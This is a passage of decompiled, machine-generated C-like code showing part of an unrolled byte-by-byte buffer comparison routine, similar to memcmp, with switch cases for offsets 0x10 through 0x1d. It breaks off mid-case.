																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xd) & 0x000000ff;
																				__eax =  *(__edx - 0xd) & 0x000000ff;
																				__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t904 = __ecx > 0;
																					__eflags = _t904;
																					__eax = 0 | _t904;
																					__ecx = _t904 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xc) & 0x000000ff;
																					__eax =  *(__edx - 0xc) & 0x000000ff;
																					__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t910 = __ecx > 0;
																						__eflags = _t910;
																						__eax = 0 | _t910;
																						__ecx = _t910 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L480;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x10:
																	L175:
																	_t1060 =  *(_t1354 - 0x10);
																	__eflags = _t1060 -  *(_t1340 - 0x10);
																	if(_t1060 ==  *(_t1340 - 0x10)) {
																		goto L188;
																	} else {
																		_t1270 = (_t1060 & 0x000000ff) - ( *(_t1340 - 0x10) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t330 = _t1270 > 0;
																			__eflags = _t330;
																			_t1270 = (0 | _t330) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xf) & 0x000000ff) - ( *(_t1340 - 0xf) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t336 = _t1270 > 0;
																				__eflags = _t336;
																				_t1270 = (0 | _t336) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xe) & 0x000000ff) - ( *(_t1340 - 0xe) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t342 = _t1270 > 0;
																					__eflags = _t342;
																					_t1270 = (0 | _t342) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0xd) & 0x000000ff) - ( *(_t1340 - 0xd) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t348 = _t1270 > 0;
																						__eflags = _t348;
																						_t1270 = (0 | _t348) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L188;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x11:
																	L268:
																	__eax =  *(__esi - 0x11);
																	__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
																	if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
																		goto L281;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x11) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t506 = __ecx > 0;
																			__eflags = _t506;
																			__eax = 0 | _t506;
																			__ecx = _t506 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x10) & 0x000000ff;
																			__eax =  *(__edx - 0x10) & 0x000000ff;
																			__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t512 = __ecx > 0;
																				__eflags = _t512;
																				__eax = 0 | _t512;
																				__ecx = _t512 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xf) & 0x000000ff;
																				__eax =  *(__edx - 0xf) & 0x000000ff;
																				__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t518 = __ecx > 0;
																					__eflags = _t518;
																					__eax = 0 | _t518;
																					__ecx = _t518 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xe) & 0x000000ff;
																					__eax =  *(__edx - 0xe) & 0x000000ff;
																					__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t524 = __ecx > 0;
																						__eflags = _t524;
																						__eax = 0 | _t524;
																						__ecx = _t524 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L281;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x12:
																	L361:
																	__eax =  *(__esi - 0x12);
																	__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
																	if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
																		goto L374;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x12) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t688 = __ecx > 0;
																			__eflags = _t688;
																			__eax = 0 | _t688;
																			__ecx = _t688 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x11) & 0x000000ff;
																			__eax =  *(__edx - 0x11) & 0x000000ff;
																			__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t694 = __ecx > 0;
																				__eflags = _t694;
																				__eax = 0 | _t694;
																				__ecx = _t694 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x10) & 0x000000ff;
																				__eax =  *(__edx - 0x10) & 0x000000ff;
																				__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t700 = __ecx > 0;
																					__eflags = _t700;
																					__eax = 0 | _t700;
																					__ecx = _t700 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xf) & 0x000000ff;
																					__eax =  *(__edx - 0xf) & 0x000000ff;
																					__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t706 = __ecx > 0;
																						__eflags = _t706;
																						__eax = 0 | _t706;
																						__ecx = _t706 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L374;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x13:
																	L454:
																	__eax =  *(__esi - 0x13);
																	__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
																	if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
																		goto L467;
																	} else {
																		__eax =  *(__edx - 0x13) & 0x000000ff;
																		__ecx =  *(__esi - 0x13) & 0x000000ff;
																		__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t867 = __ecx > 0;
																			__eflags = _t867;
																			__eax = 0 | _t867;
																			__ecx = _t867 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x12) & 0x000000ff;
																			__eax =  *(__edx - 0x12) & 0x000000ff;
																			__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t873 = __ecx > 0;
																				__eflags = _t873;
																				__eax = 0 | _t873;
																				__ecx = _t873 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x11) & 0x000000ff;
																				__eax =  *(__edx - 0x11) & 0x000000ff;
																				__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t879 = __ecx > 0;
																					__eflags = _t879;
																					__eax = 0 | _t879;
																					__ecx = _t879 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x10) & 0x000000ff;
																					__eax =  *(__edx - 0x10) & 0x000000ff;
																					__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t885 = __ecx > 0;
																						__eflags = _t885;
																						__eax = 0 | _t885;
																						__ecx = _t885 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L467;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x14:
																	L162:
																	_t1059 =  *(_t1354 - 0x14);
																	__eflags = _t1059 -  *(_t1340 - 0x14);
																	if(_t1059 ==  *(_t1340 - 0x14)) {
																		goto L175;
																	} else {
																		_t1270 = (_t1059 & 0x000000ff) - ( *(_t1340 - 0x14) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t305 = _t1270 > 0;
																			__eflags = _t305;
																			_t1270 = (0 | _t305) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x13) & 0x000000ff) - ( *(_t1340 - 0x13) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t311 = _t1270 > 0;
																				__eflags = _t311;
																				_t1270 = (0 | _t311) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x12) & 0x000000ff) - ( *(_t1340 - 0x12) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t317 = _t1270 > 0;
																					__eflags = _t317;
																					_t1270 = (0 | _t317) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x11) & 0x000000ff) - ( *(_t1340 - 0x11) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t323 = _t1270 > 0;
																						__eflags = _t323;
																						_t1270 = (0 | _t323) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L175;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x15:
																	L255:
																	__eax =  *(__esi - 0x15);
																	__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
																	if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
																		goto L268;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x15) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t481 = __ecx > 0;
																			__eflags = _t481;
																			__eax = 0 | _t481;
																			__ecx = _t481 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x14) & 0x000000ff;
																			__eax =  *(__edx - 0x14) & 0x000000ff;
																			__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t487 = __ecx > 0;
																				__eflags = _t487;
																				__eax = 0 | _t487;
																				__ecx = _t487 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x13) & 0x000000ff;
																				__eax =  *(__edx - 0x13) & 0x000000ff;
																				__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t493 = __ecx > 0;
																					__eflags = _t493;
																					__eax = 0 | _t493;
																					__ecx = _t493 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x12) & 0x000000ff;
																					__eax =  *(__edx - 0x12) & 0x000000ff;
																					__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t499 = __ecx > 0;
																						__eflags = _t499;
																						__eax = 0 | _t499;
																						__ecx = _t499 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L268;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x16:
																	L348:
																	__eax =  *(__esi - 0x16);
																	__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
																	if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
																		goto L361;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x16) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t663 = __ecx > 0;
																			__eflags = _t663;
																			__eax = 0 | _t663;
																			__ecx = _t663 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x15) & 0x000000ff;
																			__eax =  *(__edx - 0x15) & 0x000000ff;
																			__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t669 = __ecx > 0;
																				__eflags = _t669;
																				__eax = 0 | _t669;
																				__ecx = _t669 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x14) & 0x000000ff;
																				__eax =  *(__edx - 0x14) & 0x000000ff;
																				__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t675 = __ecx > 0;
																					__eflags = _t675;
																					__eax = 0 | _t675;
																					__ecx = _t675 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x13) & 0x000000ff;
																					__eax =  *(__edx - 0x13) & 0x000000ff;
																					__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t681 = __ecx > 0;
																						__eflags = _t681;
																						__eax = 0 | _t681;
																						__ecx = _t681 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L361;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x17:
																	L441:
																	__eax =  *(__esi - 0x17);
																	__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
																	if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
																		goto L454;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x17) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t841 = __ecx > 0;
																			__eflags = _t841;
																			__eax = 0 | _t841;
																			__ecx = _t841 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x16) & 0x000000ff;
																			__eax =  *(__edx - 0x16) & 0x000000ff;
																			__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t847 = __ecx > 0;
																				__eflags = _t847;
																				__eax = 0 | _t847;
																				__ecx = _t847 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x15) & 0x000000ff;
																				__eax =  *(__edx - 0x15) & 0x000000ff;
																				__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t853 = __ecx > 0;
																					__eflags = _t853;
																					__eax = 0 | _t853;
																					__ecx = _t853 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x14) & 0x000000ff;
																					__eax =  *(__edx - 0x14) & 0x000000ff;
																					__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t859 = __ecx > 0;
																						__eflags = _t859;
																						__eax = 0 | _t859;
																						__ecx = _t859 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L454;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x18:
																	L149:
																	_t1058 =  *(_t1354 - 0x18);
																	__eflags = _t1058 -  *(_t1340 - 0x18);
																	if(_t1058 ==  *(_t1340 - 0x18)) {
																		goto L162;
																	} else {
																		_t1270 = (_t1058 & 0x000000ff) - ( *(_t1340 - 0x18) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t280 = _t1270 > 0;
																			__eflags = _t280;
																			_t1270 = (0 | _t280) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x17) & 0x000000ff) - ( *(_t1340 - 0x17) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t286 = _t1270 > 0;
																				__eflags = _t286;
																				_t1270 = (0 | _t286) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x16) & 0x000000ff) - ( *(_t1340 - 0x16) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t292 = _t1270 > 0;
																					__eflags = _t292;
																					_t1270 = (0 | _t292) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x15) & 0x000000ff) - ( *(_t1340 - 0x15) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t298 = _t1270 > 0;
																						__eflags = _t298;
																						_t1270 = (0 | _t298) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L162;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x19:
																	L242:
																	__eax =  *(__esi - 0x19);
																	__eflags =  *(__esi - 0x19) -  *(__edx - 0x19);
																	if( *(__esi - 0x19) ==  *(__edx - 0x19)) {
																		goto L255;
																	} else {
																		__eax =  *(__edx - 0x19) & 0x000000ff;
																		__ecx =  *(__esi - 0x19) & 0x000000ff;
																		__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t456 = __ecx > 0;
																			__eflags = _t456;
																			__eax = 0 | _t456;
																			__ecx = _t456 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x18) & 0x000000ff;
																			__eax =  *(__edx - 0x18) & 0x000000ff;
																			__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t462 = __ecx > 0;
																				__eflags = _t462;
																				__eax = 0 | _t462;
																				__ecx = _t462 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x17) & 0x000000ff;
																				__eax =  *(__edx - 0x17) & 0x000000ff;
																				__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t468 = __ecx > 0;
																					__eflags = _t468;
																					__eax = 0 | _t468;
																					__ecx = _t468 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x16) & 0x000000ff;
																					__eax =  *(__edx - 0x16) & 0x000000ff;
																					__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t474 = __ecx > 0;
																						__eflags = _t474;
																						__eax = 0 | _t474;
																						__ecx = _t474 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L255;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x1a:
																	L335:
																	__eax =  *(__esi - 0x1a);
																	__eflags =  *(__esi - 0x1a) -  *(__edx - 0x1a);
																	if( *(__esi - 0x1a) ==  *(__edx - 0x1a)) {
																		goto L348;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1a) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t638 = __ecx > 0;
																			__eflags = _t638;
																			__eax = 0 | _t638;
																			__ecx = _t638 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x19) & 0x000000ff;
																			__eax =  *(__edx - 0x19) & 0x000000ff;
																			__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t644 = __ecx > 0;
																				__eflags = _t644;
																				__eax = 0 | _t644;
																				__ecx = _t644 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x18) & 0x000000ff;
																				__eax =  *(__edx - 0x18) & 0x000000ff;
																				__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t650 = __ecx > 0;
																					__eflags = _t650;
																					__eax = 0 | _t650;
																					__ecx = _t650 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x17) & 0x000000ff;
																					__eax =  *(__edx - 0x17) & 0x000000ff;
																					__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t656 = __ecx > 0;
																						__eflags = _t656;
																						__eax = 0 | _t656;
																						__ecx = _t656 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L348;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x1b:
																	L428:
																	__eax =  *(__esi - 0x1b);
																	__eflags =  *(__esi - 0x1b) -  *(__edx - 0x1b);
																	if( *(__esi - 0x1b) ==  *(__edx - 0x1b)) {
																		goto L441;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1b) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t816 = __ecx > 0;
																			__eflags = _t816;
																			__eax = 0 | _t816;
																			__ecx = _t816 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x1a) & 0x000000ff;
																			__eax =  *(__edx - 0x1a) & 0x000000ff;
																			__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t822 = __ecx > 0;
																				__eflags = _t822;
																				__eax = 0 | _t822;
																				__ecx = _t822 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x19) & 0x000000ff;
																				__eax =  *(__edx - 0x19) & 0x000000ff;
																				__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t828 = __ecx > 0;
																					__eflags = _t828;
																					__eax = 0 | _t828;
																					__ecx = _t828 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x18) & 0x000000ff;
																					__eax =  *(__edx - 0x18) & 0x000000ff;
																					__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t834 = __ecx > 0;
																						__eflags = _t834;
																						__eax = 0 | _t834;
																						__ecx = _t834 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L441;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x1c:
																	_t1057 =  *(_t1354 - 0x1c);
																	__eflags = _t1057 -  *(_t1340 - 0x1c);
																	if(_t1057 ==  *(_t1340 - 0x1c)) {
																		goto L149;
																	} else {
																		_t1270 = (_t1057 & 0x000000ff) - ( *(_t1340 - 0x1c) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t255 = _t1270 > 0;
																			__eflags = _t255;
																			_t1270 = (0 | _t255) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x1b) & 0x000000ff) - ( *(_t1340 - 0x1b) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t261 = _t1270 > 0;
																				__eflags = _t261;
																				_t1270 = (0 | _t261) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x1a) & 0x000000ff) - ( *(_t1340 - 0x1a) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t267 = _t1270 > 0;
																					__eflags = _t267;
																					_t1270 = (0 | _t267) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x19) & 0x000000ff) - ( *(_t1340 - 0x19) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t273 = _t1270 > 0;
																						__eflags = _t273;
																						_t1270 = (0 | _t273) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L149;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x1d:
																	__eax =  *(__esi - 0x1d);
